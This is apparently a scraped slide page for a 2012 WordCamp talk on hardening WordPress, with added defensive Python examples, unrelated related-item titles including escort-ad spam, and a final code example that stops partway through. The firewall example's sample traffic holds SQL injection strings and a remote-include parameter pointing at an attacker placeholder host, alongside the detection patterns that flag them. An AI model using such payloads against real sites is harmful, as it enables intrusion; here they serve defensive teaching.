Securing Your WordPress Website

Vladimir Lasky
http://wpexpert.com.au/
WordCamp Sydney 2012
What’s New In Today’s Talk?

1.   The biggest security threats of 2012 and how
     to deal with them
2.   An updated list of essential WordPress
     hardening steps for EVERY site
3.   New WordPress management services that
     make your life easier

Big Events in Internet Security This Year

1.   Yahoo, LinkedIn, eHarmony all experienced
     security incidents that resulted in users’
     passwords/hashes being published
2.   Lots of exploits targeting code using
     vulnerable PHP libraries including TimThumb
     and Uploadify
3.   Wi-Fi Protected Setup (WPS) vulnerability in
     Wireless Routers revealed in December 2011
Lessons From Password Disclosure Incidents

1.   You cannot assume that any website properly secures its
     databases.
2.   Plenty of computational power exists for brute-force
     cracking of leaked password hashes, so spare no effort
     to prevent the hashes from leaking in the first place.
3.   People who reuse the same password across different
     sites are asking to get "p0wned" and become targets for
     identity theft.
4.   Having a unique, strong password for every Internet
     account is mandatory.
Wi-Fi Protected Setup

Lessons from WPS Vulnerability

1.   The WPS exploit brute-forces the router's eight-digit
     WPS PIN and recovers the WPA2 passphrase, so it is a
     backdoor into routers that are otherwise properly secured
2.   Features added to make security easier to use often
     introduce new security holes
3.   Disable WPS in every Wi-Fi router that you control. Some
     routers of that era kept WPS active even when it was
     switched off in the web interface, so this may require a
     firmware upgrade or possibly even replacing the router
Example PHP Exploit Attempt

Lessons from PHP Exploits

1.   Many programmers are careless about, or unaware of,
     proper input validation practices
2.   Obtaining plugins and themes from official
     sources reduces risk, but does not guarantee
     security
3.   Application firewalls are a NECESSITY

Essential Steps to Harden Your WP Installation
Install WP Firewall 2

This plugin analyses incoming HTTP requests and checks
request parameters for patterns that indicate PHP or
SQL injection attempts
Because it matches attack patterns rather than specific
bugs, it also blocks many attacks on vulnerabilities that
are not yet patched ("zero-day" exploits); treat it as a
second line of defence, not a substitute for updates
Set the configuration option 'Suppress similar
attack warning emails' to 'On', to prevent being
deluged with identical warnings.
Rename Your Admin Account

1.   Use the plugin 'Admin Renamer Extended' to
     rename the 'admin' account to something
     unique. Brute-force bots try 'admin' first, so a
     renamed account forces them to guess the username
     as well as the password.
2.   From the WP Dashboard, go to Users -> Your
     Profile. For the option 'Display Name
     Publicly as', choose something that is not
     the same as your admin account name. The display
     name appears on every post and comment, so leaving
     it equal to the login name gives away half of the
     credential.

Change the Default MySQL Table Prefix

1.   The WordPress default MySQL table prefix is
     'wp_'.
2.   Renaming it to something unpredictable, e.g. 'tb132_',
     defeats the automated SQL injection attacks that
     hard-code table names such as wp_users. It is only a
     speed bump: an attacker with working SQL injection can
     read the real prefix from information_schema.
3.   For an existing site, use the plugin "WordPress
     Table Rename" to make this easier. The prefix also
     appears inside rows of the options and usermeta tables
     (the user roles option and each user's capabilities),
     and those must be renamed too or every user loses
     their role.

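The following added example spells out what a prefix change actually involves, since the plugin hides it. It is not the WordPress Table Rename plugin's code; it generates the statements for a single-site WordPress 3.x install and runs them against a throw-away in-memory SQLite copy of the two tables that carry the prefix in their data. The table list, the sample rows and the target prefix 'tb132_' are this example's assumptions.

```python
import re
import sqlite3

# Same character set WordPress itself accepts for $table_prefix in wp-config.php.
PREFIX_RE = re.compile(r"^[A-Za-z0-9_]+$")

# Core tables of a single-site WordPress 3.x install (assumed list).
CORE_TABLES = ["commentmeta", "comments", "links", "options", "postmeta",
               "posts", "terms", "term_relationships", "term_taxonomy",
               "usermeta", "users"]


def prefix_migration(old, new, tables=CORE_TABLES):
    """Return the SQL statements that move a WordPress database from prefix
    `old` to prefix `new`. ALTER TABLE ... RENAME TO is accepted by MySQL and
    SQLite alike, which is why it is used instead of MySQL's RENAME TABLE."""
    for p in (old, new):
        if not PREFIX_RE.match(p):
            raise ValueError("prefix may only contain letters, digits and underscores: %r" % p)
    stmts = ["ALTER TABLE %s%s RENAME TO %s%s" % (old, t, new, t) for t in tables]
    # The prefix is also stored *inside* row data in two places. Forgetting
    # these leaves every user without a role, i.e. locked out of wp-admin.
    stmts.append(
        "UPDATE %soptions SET option_name = '%suser_roles' "
        "WHERE option_name = '%suser_roles'" % (new, new, old))
    # Covers <prefix>capabilities, <prefix>user_level and any other per-user
    # key that starts with the prefix (REPLACE is fine here because the old
    # prefix only occurs once, at the start of these keys).
    stmts.append(
        "UPDATE %susermeta SET meta_key = REPLACE(meta_key, '%s', '%s') "
        "WHERE SUBSTR(meta_key, 1, %d) = '%s'" % (new, old, new, len(old), old))
    return stmts


def demo():
    """Run the migration on a constructed SQLite copy of wp_options/wp_usermeta
    and return (table names, option names, meta keys) afterwards."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE wp_options (option_name TEXT, option_value TEXT);
        CREATE TABLE wp_usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT);
        INSERT INTO wp_options VALUES ('wp_user_roles', 'serialized role table');
        INSERT INTO wp_options VALUES ('siteurl', 'http://example.com');
        INSERT INTO wp_usermeta VALUES (1, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}');
        INSERT INTO wp_usermeta VALUES (1, 'wp_user_level', '10');
        INSERT INTO wp_usermeta VALUES (1, 'nickname', 'vlad');
    """)
    for stmt in prefix_migration("wp_", "tb132_", ["options", "usermeta"]):
        db.execute(stmt)
    # sqlite_master plays the role information_schema plays on MySQL: this is
    # exactly the query an attacker with SQL injection uses to learn the prefix.
    tables = sorted(r[0] for r in db.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'"))
    opts = sorted(r[0] for r in db.execute("SELECT option_name FROM tb132_options"))
    meta = sorted(r[0] for r in db.execute("SELECT meta_key FROM tb132_usermeta"))
    return tables, opts, meta


if __name__ == "__main__":
    for s in prefix_migration("wp_", "tb132_"):
        print(s + ";")
    print(demo())
```

After running the generated statements against the live MySQL database, set `$table_prefix` in wp-config.php to the new value, or WordPress will not find its tables at all. Take a backup first; the statements are not reversible by the site itself.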
Prevent Plaintext Password Transmission – Best Option

1.   Have your site hosted with a provider that supports
     HTTPS and provides either:
     -   Their own shared SSL certificate
     -   The ability to install your own
     -   The ability to obtain one for you and install it (usually for a
         fee)

2.   Install the plugin "WP HTTPS (SSL)" and enable the
     option "Force SSL Administration".
3.   This prevents your password and session cookies
     from being sniffed (captured) on the network between
     your browser and the server
Prevent Plaintext Password Transmission – Next Best

1.   If you can't use HTTPS, then install the plugin
     "Semisecure Login Reimagined".
2.   This uses JavaScript to encrypt your password
     before sending it to the server, so the password
     itself never crosses the network in the clear
3.   It does not protect the session cookie, which still
     travels over plain HTTP, so make sure you log out
     from WordPress to invalidate it; otherwise a network
     eavesdropper can capture the cookie and re-use it.

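The two slides above come down to one check: is the password submitted over HTTPS, and are the session cookies marked so the browser will never send them over plain HTTP? The added example below audits a captured login response for exactly that. It is not code from either plugin; the two HTTP responses are constructed samples, and the cookie name prefixes are those WordPress uses for its authentication cookies.

```python
# WordPress authentication cookies: wordpress_<hash> (or wordpress_sec_<hash>
# when admin is forced onto SSL) and wordpress_logged_in_<hash>.
WP_SESSION_COOKIES = ("wordpress_logged_in_", "wordpress_sec_", "wordpress_")


def parse_set_cookies(raw_response):
    """Yield (cookie name, set of lower-cased attribute names) for every
    Set-Cookie header in a raw HTTP response."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:          # skip the status line
        key, _, value = line.partition(":")
        if key.strip().lower() != "set-cookie":
            continue
        parts = [p.strip() for p in value.split(";")]
        name = parts[0].split("=", 1)[0]
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        yield name, attrs


def audit_login_response(login_url, raw_response):
    """Return a list of problems; an empty list means neither the password nor
    the resulting session cookies are exposed to a network eavesdropper."""
    problems = []
    if not login_url.lower().startswith("https://"):
        problems.append("login form submitted over plain HTTP: password is sniffable")
    for name, attrs in parse_set_cookies(raw_response):
        if name == "wordpress_test_cookie" or not name.startswith(WP_SESSION_COOKIES):
            continue
        if "secure" not in attrs:
            problems.append("%s lacks Secure: browser will also send it over HTTP" % name)
        if "httponly" not in attrs:
            problems.append("%s lacks HttpOnly: readable by injected scripts" % name)
    return problems


# Constructed sample: a login over plain HTTP, cookie set without Secure.
PLAIN_HTTP = (
    "HTTP/1.1 302 Found\r\n"
    "Set-Cookie: wordpress_logged_in_abc123=admin%7C1350000000%7Cdeadbeef; path=/; httponly\r\n"
    "Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/\r\n"
    "Location: http://example.com/wp-admin/\r\n"
    "\r\n")

# Constructed sample: the same login after forcing SSL administration.
FORCED_SSL = (
    "HTTP/1.1 302 Found\r\n"
    "Set-Cookie: wordpress_sec_abc123=admin%7C1350000000%7Cdeadbeef; path=/wp-admin; secure; httponly\r\n"
    "Set-Cookie: wordpress_logged_in_abc123=admin%7C1350000000%7Cdeadbeef; path=/; secure; httponly\r\n"
    "Location: https://example.com/wp-admin/\r\n"
    "\r\n")


if __name__ == "__main__":
    for url, resp in [("http://example.com/wp-login.php", PLAIN_HTTP),
                      ("https://example.com/wp-login.php", FORCED_SSL)]:
        print(url, audit_login_response(url, resp) or ["ok"])
```

WordPress core has the same switch as the plugin option, the FORCE_SSL_ADMIN constant in wp-config.php; either way, the cookies must carry the Secure flag, because encrypting only the login form (as the "next best" approach does) leaves the cookie for an eavesdropper to replay.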
Prevent Brute-Force Login Attempts

Install one of the following plugins:
1.   Login Security Solution
     -   Slows down the response time of your website after
         multiple failed attempts
     -   Prevents users from choosing weak passwords
2.   Limit Login Attempts
     -   Locks out accounts for a set time period after
         multiple failed attempts

Install WP File Monitor Plus
This plugin monitors the files under your
WP installation for changes.
When a change is detected, it
displays a dashboard alert and can
also send an email.
As an administrator, you can view
the list of changes and spot anything
unexpected or unusual.

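File monitoring of this kind is a baseline-and-compare loop: hash every file once, store the result somewhere the web server cannot write, and report what was added, removed or modified since. The added example below does that over a throw-away directory laid out like a WordPress install; it is not WP File Monitor Plus's code, and the files and the simulated tampering are constructed for the example.

```python
import hashlib
import os
import shutil
import tempfile


def snapshot(root):
    """Map relative path -> SHA-256 hex digest for every regular file under root."""
    result = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()                      # deterministic order
        for fn in sorted(filenames):
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            h = hashlib.sha256()
            with open(full, "rb") as f:
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            result[rel] = h.hexdigest()
    return result


def diff_snapshots(baseline, current):
    """Compare two snapshots and return the three change lists the dashboard shows."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in set(baseline) & set(current)
                           if baseline[p] != current[p]),
    }


def _write(root, rel, text):
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as f:
        f.write(text)


def demo():
    """Build a tiny WordPress-like tree, take a baseline, then simulate a
    compromise: wp-config.php edited, a plugin file deleted, and a PHP file
    dropped into the uploads directory (a classic place for a backdoor)."""
    root = tempfile.mkdtemp(prefix="wp-monitor-")
    try:
        _write(root, "wp-config.php", "<?php define('DB_NAME', 'wp');\n")
        _write(root, "wp-content/plugins/hello/hello.php", "<?php // Hello Dolly\n")
        _write(root, "wp-content/uploads/2012/09/photo.jpg", "not really a jpeg\n")
        baseline = snapshot(root)

        _write(root, "wp-config.php", "<?php define('DB_NAME', 'wp');\n@include '/tmp/x';\n")
        os.remove(os.path.join(root, "wp-content", "plugins", "hello", "hello.php"))
        _write(root, "wp-content/uploads/2012/09/image.php", "<?php // constructed dropped file\n")
        return diff_snapshots(baseline, snapshot(root))
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Two practical points the plugin's settings also reflect: exclude genuinely volatile paths (cache directories) so the alerts stay readable, and keep the baseline outside the web root, because an attacker who can write to the site can otherwise simply update the baseline to match.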
Essential Security Habits
Regularly Update Your Site, Plugins and Themes

The last talk stressed the importance of performing
regular updates to WordPress, themes and plugins
and performing regular remotely-initiated backups.
Several WordPress management services now exist
to simplify and speed up these steps:
-   ManageWP (hosted)
-   InfiniteWP (self-hosted)
-   WP Remote (hosted)
-   Worpit (hosted)

Accessing Your Site From Untrusted PCs

Two-factor authentication is mandatory
This combines your password with a one-time code
from a key fob, an SMS message or a mobile
phone app, obtained fresh each time you log in, so a
password captured on the untrusted PC is useless
on its own
WordPress two-factor plugins include:
1.   Second Factor
2.   Google Authenticator
3.   Duo Two-Factor Authentication

Accessing Your Site From Untrusted Networks

1.   If you can, use your smartphone or a laptop
     PC equipped with 3G, 4G or GPRS mobile
     Internet rather than the local network
2.   If you are forced to use a public Wi-Fi access
     point or LAN, ensure that any sites requiring
     authentication are accessed via their HTTPS
     (secure) link.

Choosing a Password
Twelve characters long as a minimum, and not a
dictionary word
Common number/letter substitutions (e.g. '0' for 'o',
'@' for 'a') provide little extra security; cracking
tools almost always try them automatically

Password Memorisation Techniques
1.   Come up with a memorable sentence, and use the
     first letters of each word to form the password, e.g.
     -   "Jack and Jill went up the hill to fetch a pail of water"
         could form the 13-character password "JaJwuthtfapow"

2.   Three unrelated dictionary words one
     after the other, misspelt in a way known only to
     you
On your own trusted PC, consider using an
encrypted password manager like KeePass

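The previous two slides can be turned into a checker that reasons the way a cracking tool does: strip the trailing digits and symbols, undo the common substitutions, and only then ask whether a dictionary word is left. The added example below does that and also derives the sentence-initials password from the slide. It is this page's own illustration, not Login Security Solution's password policy; the tiny word list is constructed (real runs use lists of millions of entries).

```python
import re

# Constructed mini word list standing in for a real cracking dictionary.
WORDLIST = {"password", "wordpress", "letmein", "sydney", "welcome", "admin", "monkey"}

# The substitutions the slide warns about; crackers apply these as rules.
LEET = str.maketrans({"0": "o", "1": "i", "3": "e", "4": "a", "5": "s",
                      "7": "t", "@": "a", "$": "s", "!": "i"})


def normalise(pw):
    """Reduce a candidate to the word a rule-based cracker would derive it
    from: drop trailing digits/symbols, undo leet substitutions, lower-case."""
    base = re.sub(r"[\d!@#$%^&*]+$", "", pw)
    return base.translate(LEET).lower()


def assess(pw, min_len=12):
    """Return a list of reasons the password is weak; empty means it passes."""
    problems = []
    if len(pw) < min_len:
        problems.append("shorter than %d characters" % min_len)
    core = normalise(pw)
    if core in WORDLIST:
        problems.append("dictionary word once substitutions and suffix are stripped (%r)" % core)
    if re.fullmatch(r"(.)\1*", pw):
        problems.append("single repeated character")
    return problems


def from_sentence(sentence):
    """First letter of every word, keeping the sentence's capitalisation
    (the memorisation technique from the slide)."""
    return "".join(w[0] for w in re.findall(r"[A-Za-z']+", sentence))


if __name__ == "__main__":
    for candidate in ["P@ssw0rd1", "W0rdpr3ss2012!",
                      from_sentence("Jack and Jill went up the hill to fetch a pail of water")]:
        print(candidate, assess(candidate) or ["ok"])
```

`W0rdpr3ss2012!` is 14 characters and uses digits, symbols and substitutions, yet it normalises to `wordpress` and falls in the first seconds of a dictionary run; the 13-character sentence-initials password contains no word at all and passes.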
Conclusion
 Slides from Previous Talk at Wordcamp GC 2011:
 – http://slidesha.re/tr2XA5
 – Covers the “Three Pillars of Security”, the aims of attackers and other
    WordPress security plugins

 ManageWP - 30% discount on all plans for WordCamp Sydney
 Attendees:
 – http://managewp.com/wcsyd

 Questions and Comments:
 – http://wpexpert.com.au/contact-us/
A Secure and Reliable Document Management System is Essential.docx
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
Tech Tuesday-Harness the Power of Effective Resource Planning with OnePlan’s ...
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdfLearn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
Learn the Fundamentals of XCUITest Framework_ A Beginner's Guide.pdf
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...
 
Diamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with PrecisionDiamond Application Development Crafting Solutions with Precision
Diamond Application Development Crafting Solutions with Precision
 
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online  ☂️CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online  ☂️
CALL ON ➥8923113531 🔝Call Girls Kakori Lucknow best sexual service Online ☂️
 
Clustering techniques data mining book ....
Clustering techniques data mining book ....Clustering techniques data mining book ....
Clustering techniques data mining book ....
 

Securing Your WordPress Website - WordCamp Sydney 2012

  • 1. Securing Your WordPress Website
    Vladimir Lasky
    http://wpexpert.com.au/
    WordCamp Sydney 2012
  • 2. What’s New In Today’s Talk?
    1. The biggest security threats of 2012 and how to deal with them
    2. An updated list of essential WordPress hardening steps for EVERY site
    3. New WordPress management services that make your life easier
  • 3. Big Events in Internet Security This Year
    1. Yahoo, LinkedIn, eHarmony all experienced security incidents that resulted in users’ passwords/hashes being published
    2. Lots of exploits targeting code using vulnerable PHP libraries including TimThumb and Uploadify
    3. Wi-Fi Protected Setup (WPS) vulnerability in Wireless Routers revealed in December 2011
  • 6. Lessons From Password Disclosure Incidents
    1. You cannot assume any website will properly secure its databases.
    2. Plenty of computational power exists for brute-force password cracking of password hashes – spare no effort to prevent these from being leaked.
    3. People who reuse the same password across different sites are asking to get “p0wned” and become targets for identity theft.
    4. Having a unique, secure password for every Internet account is mandatory.
  • 8. Lessons from WPS Vulnerability
    1. The WPS exploit provides a backdoor to wireless routers secured with WPA2
    2. Technologies that overcome security burdens often introduce security holes
    3. Disable WPS in every Wi-Fi Router that you control. In some cases, this will require a firmware upgrade or possibly even replacing the router
  • 10. Lessons from PHP Exploits
    1. Many programmers are lazy or ignorant of proper data validation practices
    2. Obtaining plugins and themes from official sources reduces risk, but does not guarantee security
    3. Application firewalls are a NECESSITY
  • 11. Essential Steps to Harden Your WP Installation
  • 12. Install WP Firewall 2
    This plugin analyses HTTP requests and checks for suspicious parameters that indicate PHP or SQL injection attempts.
    It will protect you against the majority of zero-day exploits.
    Set the configuration option ‘Suppress similar attack warning emails’ to ‘On’ to prevent being deluged with identical warnings.
  • 13. Rename Your Admin Account
    1. Use the plugin ‘Admin Renamer Extended’ to rename the ‘admin’ account to something unique.
    2. From the WP Dashboard, go to Users->Your Profile. For the option ‘Display Name Publicly as’, choose something that is not the same as your admin account name
  • 14. Change the Default MySQL Table Prefix
    1. The WordPress default MySQL table prefix is ‘wp_’.
    2. By renaming this to something else, e.g. ‘tb132_’, we can foil the majority of blind SQL injection attempts
    3. For an existing site, use the plugin “WordPress Table Rename” to make this easier.
  • 15. Prevent Plaintext Password Transmission – Best Option
    1. Have your site hosted with a provider that supports HTTPS and provides either:
       – Their own Shared SSL Certificate
       – The ability to install your own
       – The ability to obtain one for you and install it (usually for a fee)
    2. Install the plugin “WP HTTPS (SSL)” and enable the option “Force SSL Administration”.
    3. This will prevent your password and session cookies from being sniffed (captured) over the network
  • 16. Prevent Plaintext Password Transmission – Next Best
    1. If you can’t use HTTPS, then install the plugin “Semisecure Login Reimagined”.
    2. This uses JavaScript to encrypt your password before sending it to the server
    3. Make sure you log out from WordPress to prevent network eavesdroppers from sniffing (capturing) and re-using your session key.
  • 17. Prevent Brute-Force Login Attempts
    Install one of the following plugins:
    1. Login Security Solution
       – Slows down response time of your website after multiple failed attempts
       – Prevents users from choosing weak passwords
    2. Limit Login Attempts
       – Locks out accounts for a set time period after multiple failed attempts
  • 18. Install WP File Monitor Plus
    This plugin monitors files under your WP installation for changes.
    When a change is detected, it displays a dashboard alert and can also send an email.
    As an administrator, you can view the list of changes and spot anything unexpected or unusual.
  • 20. Regularly Update Your Site, Plugins and Themes
    The last talk stressed the importance of performing regular updates to WordPress, themes and plugins and performing regular remotely-initiated backups.
    Several WordPress management services now exist to simplify and speed up these steps:
    – ManageWP (hosted)
    – InfiniteWP (self-hosted)
    – WP Remote (hosted)
    – Worpit (hosted)
  • 21. Accessing Your Site From Untrusted PCs
    Two-factor authentication is mandatory.
    This is a combination of a password and a random number from a key fob, SMS message or a mobile phone app that you obtain each time you log in.
    WordPress two-factor plugins include:
    1. Second Factor
    2. Google Authenticator
    3. Duo Two-Factor Authentication
  • 22. Accessing Your Site From Untrusted Networks
    1. If you can, use your smart phone or laptop PC equipped with 3G, 4G or GPRS Mobile Internet
    2. If you are forced to use a public WiFi access point or LAN, ensure that any sites requiring authentication are accessed via their HTTPS (secure) link.
  • 23. Choosing a Password
    Twelve characters long as a minimum, but not a dictionary word.
    Common number/letter substitutions provide little extra security – cracking tools almost always check for these.
  • 24. Password Memorisation Techniques
    1. Come up with a memorable sentence, and use the first letters of each word to form the password, e.g.
       – “Jack and Jill went up the hill to fetch a pail of water” could form a 13-character password “JaJwuthtfapow”
    2. Three unrelated, unconnected dictionary words one after the other, misspelt a certain way known to you
    On your own trusted PC, consider using an encrypted password manager like KeePass.
  • 25. Conclusion
    Slides from Previous Talk at WordCamp GC 2011:
    – http://slidesha.re/tr2XA5
    – Covers the “Three Pillars of Security”, the aims of attackers and other WordPress security plugins
    ManageWP - 30% discount on all plans for WordCamp Sydney Attendees:
    – http://managewp.com/wcsyd
    Questions and Comments:
    – http://wpexpert.com.au/contact-us/
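Slide 12 describes what an application firewall such as WP Firewall 2 does: inspect request parameters for patterns that indicate SQL or PHP injection, and avoid flooding the administrator with identical warning e-mails. The block below is an added Python illustration of that logic, not the plugin's own code; the rule set, the sample requests and the one-warning-per-hour suppression policy are all constructed for this example.

```python
"""Request-parameter screening in the style of a WordPress application firewall.

Added example (Python, not the WP Firewall 2 plugin's code). The rules, the
sample traffic and the alert-suppression window are constructed for illustration.
"""
import re
from urllib.parse import unquote_plus

# Each rule: (name, compiled regex). Parameter values are URL-decoded before
# matching and the regexes are case-insensitive, so simple encoding or
# capitalisation tricks do not slip past a rule.
RULES = [
    ("sqli_tautology", re.compile(r"'\s*or\s*'?\d+'?\s*=\s*'?\d+", re.I)),
    ("sqli_union", re.compile(r"\bunion\b\s+(all\s+)?\bselect\b", re.I)),
    ("sqli_comment", re.compile(r"(--|#|/\*)\s*$")),
    ("php_rfi", re.compile(r"^(https?|ftp|php|data):", re.I)),
    ("php_code", re.compile(r"(<\?php|\beval\s*\(|base64_decode\s*\()", re.I)),
    ("path_traversal", re.compile(r"(\.\./|\.\.\\)")),
]


def screen_params(params):
    """Return a list of (rule_name, parameter_name) findings for one request."""
    findings = []
    for name, raw in params.items():
        value = unquote_plus(str(raw))
        for rule_name, rx in RULES:
            if rx.search(value):
                findings.append((rule_name, name))
    return findings


class AlertDeduper:
    """Decide whether a finding warrants a fresh warning e-mail.

    Mirrors the 'Suppress similar attack warning emails' idea: at most one
    warning per (rule, parameter) pair within the window.
    """

    def __init__(self, window_seconds=3600):
        self.window = window_seconds
        self._last_sent = {}  # (rule, param) -> time of the last warning

    def should_notify(self, finding, now):
        last = self._last_sent.get(finding)
        if last is not None and now - last < self.window:
            return False
        self._last_sent[finding] = now
        return True


def process_requests(requests, deduper, start_time=0):
    """Screen (seconds_offset, params) pairs; return (findings, emails_sent)."""
    emails = 0
    all_findings = []
    for offset, params in requests:
        for finding in screen_params(params):
            all_findings.append(finding)
            if deduper.should_notify(finding, start_time + offset):
                emails += 1
    return all_findings, emails


# Constructed sample traffic: benign requests mixed with injection attempts.
SAMPLE_REQUESTS = [
    (0, {"s": "wordpress hardening", "paged": "2"}),
    (5, {"id": "1' OR '1'='1", "action": "view"}),
    (10, {"id": "1%27%20OR%20%271%27%3D%271"}),  # same payload, URL-encoded
    (15, {"p": "42", "cat": "-1 UNION SELECT 1,2,3"}),
    (20, {"page": "http://attacker.example/shell.txt"}),  # remote-include style
    (25, {"comment": "Nice article, thanks!"}),
]

if __name__ == "__main__":
    found, sent = process_requests(SAMPLE_REQUESTS, AlertDeduper())
    for f in found:
        print("finding:", f)
    print("warning e-mails sent:", sent)
```

Running the sample gives four findings but only three e-mails, because the URL-encoded repeat of the first payload hits the same (rule, parameter) pair inside the suppression window.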
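Slide 17 names two defences against brute-force logins: slowing the response after repeated failures (Login Security Solution) and locking the account out for a period (Limit Login Attempts). The following added Python example, which is not the code of either plugin, combines both: an exponentially growing delay per failure and a lockout after a threshold. Thresholds, the clock and the attempt sequence are constructed for illustration.

```python
"""Login throttling plus lockout, as an added example (Python, not plugin code).

Failures are tracked per (username, client IP). Each failure doubles the delay
applied to the next attempt; the fifth failure locks the pair out for 15 minutes.
All thresholds and the sample attempts are constructed for this illustration.
"""


class LoginGuard:
    def __init__(self, max_failures=5, lockout_seconds=900,
                 base_delay=1.0, max_delay=30.0):
        self.max_failures = max_failures
        self.lockout_seconds = lockout_seconds
        self.base_delay = base_delay
        self.max_delay = max_delay
        self._failures = {}      # key -> list of failure timestamps
        self._locked_until = {}  # key -> time the lockout expires

    @staticmethod
    def _key(username, ip):
        return (username.lower(), ip)

    def check(self, username, ip, now):
        """Return (allowed, delay_seconds) to apply before processing an attempt."""
        key = self._key(username, ip)
        locked = self._locked_until.get(key)
        if locked is not None:
            if now < locked:
                return False, 0.0
            # lockout has expired: start with a clean slate
            del self._locked_until[key]
            self._failures.pop(key, None)
        n = len(self._failures.get(key, []))
        delay = min(self.base_delay * 2 ** (n - 1), self.max_delay) if n else 0.0
        return True, delay

    def record(self, username, ip, success, now):
        """Record the outcome; returns 'ok', 'failed' or 'locked'."""
        key = self._key(username, ip)
        if success:
            self._failures.pop(key, None)
            self._locked_until.pop(key, None)
            return "ok"
        fails = self._failures.setdefault(key, [])
        fails.append(now)
        if len(fails) >= self.max_failures:
            self._locked_until[key] = now + self.lockout_seconds
            return "locked"
        return "failed"


def simulate(guard, attempts):
    """Replay constructed (seconds, user, ip, password_ok) tuples; return outcomes."""
    outcomes = []
    for t, user, ip, ok in attempts:
        allowed, delay = guard.check(user, ip, t)
        if not allowed:
            outcomes.append(("rejected", 0.0))
            continue
        outcomes.append((guard.record(user, ip, ok, t), delay))
    return outcomes


# Constructed attempt log: a guessing run against the default account name,
# an unrelated legitimate user, and a retry after the lockout expires.
SAMPLE_ATTEMPTS = [
    (0, "admin", "203.0.113.7", False),
    (1, "admin", "203.0.113.7", False),
    (2, "admin", "203.0.113.7", False),
    (3, "admin", "203.0.113.7", False),
    (4, "admin", "203.0.113.7", False),       # fifth failure triggers lockout
    (5, "admin", "203.0.113.7", True),        # correct password, still rejected
    (10, "editor", "198.51.100.9", True),     # other user/IP pair is unaffected
    (4 + 900, "admin", "203.0.113.7", True),  # lockout expired, login succeeds
]

if __name__ == "__main__":
    for outcome in simulate(LoginGuard(), SAMPLE_ATTEMPTS):
        print(outcome)
```

Keying on (username, IP) rather than on the username alone keeps a single guessing source from locking the real administrator out of the site, at the cost of not stopping a distributed attempt from many addresses; the delay still applies per pair, and that trade-off is worth stating in a site's own policy.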
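Slide 18 recommends WP File Monitor Plus, which watches the files under a WordPress installation and reports changes. To show what such a monitor does internally, here is an added Python example (not the plugin's code): a SHA-256 baseline of a directory tree, a second snapshot, and a report of added, removed and modified files. The miniature WordPress tree it builds in a temporary directory is constructed for the example; the `wp-content/cache` exclusion is an assumption about what a site would treat as noise.

```python
"""File-integrity monitoring over a WordPress tree, as an added example.

Not the code of WP File Monitor Plus. The directory layout and file contents
are constructed inside a temporary directory so the example runs anywhere.
"""
import hashlib
import os
import tempfile

# Directories whose contents churn legitimately (constructed assumption).
# Uploads are deliberately NOT excluded: a new PHP file there is worth an alert.
DEFAULT_SKIP_DIRS = ("wp-content/cache",)


def snapshot(root, skip_dirs=DEFAULT_SKIP_DIRS):
    """Map each file's path (relative to root, '/'-separated) to its SHA-256."""
    digests = {}
    for dirpath, dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        rel_dir = "" if rel_dir == "." else rel_dir
        # prune in place so os.walk does not descend into skipped directories
        dirnames[:] = [d for d in dirnames
                       if (rel_dir + "/" + d).strip("/") not in skip_dirs]
        for fn in sorted(filenames):
            h = hashlib.sha256()
            with open(os.path.join(dirpath, fn), "rb") as f:
                for chunk in iter(lambda: f.read(65536), b""):
                    h.update(chunk)
            digests[(rel_dir + "/" + fn).strip("/")] = h.hexdigest()
    return digests


def diff_snapshots(baseline, current):
    """Compare two snapshots; each list is sorted for stable reporting."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline
                      if p in current and baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo():
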